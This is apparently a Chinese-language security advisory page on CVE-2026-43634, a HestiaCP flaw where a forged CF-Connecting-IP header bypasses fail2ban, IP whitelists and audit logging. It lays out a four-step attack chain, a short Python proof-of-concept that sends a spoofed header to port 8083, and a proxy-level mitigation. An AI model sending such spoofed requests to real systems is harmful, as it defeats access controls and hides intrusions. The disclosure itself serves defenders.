CVE-2026-43634 CVSS 7.5 高危

CVE-2026-43634 HestiaCP IP欺骗漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43634

漏洞类型

IP欺骗

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

HestiaCP

漏洞概述

HestiaCP 1.2.0至1.9.4版本存在IP欺骗漏洞。由于未验证请求来源，攻击者可通过伪造CF-Connecting-IP头部绕过安全控制。该漏洞允许未认证攻击者规避fail2ban保护、绕过IP白名单，并伪造审计日志，严重影响系统完整性。

技术细节

该漏洞的核心在于HestiaCP对HTTP头部`CF-Connecting-IP`的过度信任。在Cloudflare代理场景下，应用通常依赖此头部获取客户端真实IP。然而，HestiaCP未校验请求的直接来源是否为Cloudflare的IP段，导致任意攻击者均可注入恶意头部。利用此漏洞，攻击者可将该头部设置为受信任的IP（如管理员IP或白名单IP），从而欺骗应用层的访问控制逻辑。这不仅绕过了fail2ban的暴力破解防御机制，还能绕过基于IP的访问限制。同时，由于后端日志记录了伪造的IP，攻击者成功掩盖了真实来源，导致审计失效，为后续攻击提供了掩护。

攻击链分析

STEP 1

侦察

识别使用HestiaCP且配置了Cloudflare（或信任CF-Connecting-IP头）的目标。

STEP 2

构造恶意请求

攻击者发送HTTP请求，并在头部中注入伪造的`CF-Connecting-IP`地址（如白名单IP）。

STEP 3

绕过安全控制

HestiaCP错误地将伪造IP视为客户端真实源，从而绕过fail2ban封禁和IP白名单限制。

STEP 4

日志污染

审计日志记录了攻击者伪造的IP而非真实IP，掩盖攻击痕迹。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-43634: HestiaCP IP Spoofing
import requests

target = "http://<TARGET_IP>:8083/" # HestiaCP default port
spoofed_ip = "127.0.0.1" # IP to spoof (e.g. whitelisted IP)

headers = {
    "User-Agent": "Mozilla/5.0",
    "CF-Connecting-IP": spoofed_ip
}

try:
    response = requests.get(target, headers=headers)
    print(f"Status Code: {response.status_code}")
    # Check server logs to verify if the IP was accepted as the client IP
    print("Request sent. Verify if authentication checks were bypassed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

HestiaCP 1.2.0 至 1.9.4

防御指南

临时缓解措施

如果无法立即升级，应在反向代理（如Nginx）层面配置规则，仅当请求来自Cloudflare官方IP段时，才将`CF-Connecting-IP`头的值传递给后端HestiaCP应用，否则丢弃该头部或拒绝请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表